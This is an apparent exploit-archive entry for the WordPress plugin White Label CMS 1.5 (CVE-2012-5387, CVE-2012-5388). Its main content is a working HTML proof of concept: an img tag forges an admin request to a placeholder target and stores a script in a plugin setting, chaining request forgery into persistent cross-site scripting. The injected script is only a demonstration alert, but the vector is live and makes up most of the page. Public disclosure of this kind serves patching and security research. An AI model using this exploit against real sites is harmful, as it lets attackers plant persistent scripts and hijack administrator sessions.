Skip to content
cyberexploits
webappphptext

WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

Published on 2012-10-22

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/22156.txt7eac4c3a
raw
# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS

# Date: 21/10/2012

# Exploit Author: pcsjj

# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/

# Version: 1.5

# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/

# Downloads: 110,313

# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)



<html>

<title>White Label CMS CSRF</title>

<body>

<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div

"'>

</body>

</html>
View on GitHub